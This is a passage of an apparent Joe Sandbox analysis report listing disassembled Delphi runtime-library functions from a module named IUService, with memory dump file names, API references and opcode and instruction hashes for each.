                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 5000384A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrpvibFillSystem@@
                                                                                                                                            • String ID: <JP$jP
                                                                                                                                            • API String ID: 4121559260-1976356052
                                                                                                                                            • Opcode ID: 36264c1cf101ac4c8ec33a34441a950c0984b743827c9545f83337dbb8638ebb
                                                                                                                                            • Instruction ID: 0b5a206ebe67b66b8e3c020c356c1e6d665bc0067f7b04b9bcba261746849486
                                                                                                                                            • Opcode Fuzzy Hash: 36264c1cf101ac4c8ec33a34441a950c0984b743827c9545f83337dbb8638ebb
                                                                                                                                            • Instruction Fuzzy Hash: 60319071605B818FE366CFADD894749B7E8FF50624F94C369E5588B252DB70EC01CB81
                                                                                                                                            Function 50021580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@FPower10$qqrv.RTL120 ref: 50021606
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Power10$qqrvSystem@
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 140778524-2137968064
                                                                                                                                            • Opcode ID: 32b8098c721a4e46187648da88f365d788b2412693a4c3184540e22e5d6e62b9
                                                                                                                                            • Instruction ID: 331eab40c37fd92a1dba551ef5550b3055afbfd15106153d872e105f9a111e51
                                                                                                                                            • Opcode Fuzzy Hash: 32b8098c721a4e46187648da88f365d788b2412693a4c3184540e22e5d6e62b9
                                                                                                                                            • Instruction Fuzzy Hash: 8B21C910E0B0D76EE72016A8F8487DEBFE59F31620F6C0B9BD8C483243D9308D828790
                                                                                                                                            Function 50021408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@FPower10$qqrv.RTL120(00000000,00000000,?,00000000), ref: 5002148D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Power10$qqrvSystem@
                                                                                                                                            • String ID: +$-
                                                                                                                                            • API String ID: 140778524-2137968064
                                                                                                                                            • Opcode ID: cf31913889536f98ca9fe7bf4674e760db0a12c29d842ff9dc99d359c51be7e3
                                                                                                                                            • Instruction ID: fa1cfcb7d4169ee6ed92dfde316ec9fe3663952840befaa7f587ccd8d0985425
                                                                                                                                            • Opcode Fuzzy Hash: cf31913889536f98ca9fe7bf4674e760db0a12c29d842ff9dc99d359c51be7e3
                                                                                                                                            • Instruction Fuzzy Hash: F5110211E0B0C769E72136A5F8407DEBBE5AB71724F6C0B9BD4CC86242D9298E8287D0
                                                                                                                                            Function 50004610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000467A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Length$qqrr20StringiSystem@System@@Unicode
                                                                                                                                            • String ID: $"
                                                                                                                                            • API String ID: 1238308113-3817095088
                                                                                                                                            • Opcode ID: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                                                            • Instruction ID: a4110a0b3ab76dcf93db08b7b91ce8b4ca9335338cd7ea686d5f75d583f17b04
                                                                                                                                            • Opcode Fuzzy Hash: 3740d5a8882292424296d33065260b11a727ea2989f92afca789f2fadf23aca0
                                                                                                                                            • Instruction Fuzzy Hash: B211E9C3E011A085F7B42700D8322E722E2EB93B517EA0356CC80CB656F2A34C91D55F
                                                                                                                                            Function 50005454 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ResetText$qqrr15System@TTextRec.RTL120(?,5000549E,?,500050BF), ref: 5000546C
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(?,5000549E,?,500050BF), ref: 50005485
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Res$qqriResetSystem@@TextText$qqrr15
                                                                                                                                            • String ID: `@P
                                                                                                                                            • API String ID: 3749152163-4219215009
                                                                                                                                            • Opcode ID: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                                                            • Instruction ID: 3488a2e08867437c2cb3a72290a42c38b3174c830ac736cddd9b2ab7f76a7471
                                                                                                                                            • Opcode Fuzzy Hash: 474c6b335946cc709f9bfe439fa6d2f0613b7dda503e967d2b86d165faebaa74
                                                                                                                                            • Instruction Fuzzy Hash: B8D05E897472D08ABB40AFF828F029495A05B48152B84D667FD84CB253E659CA549365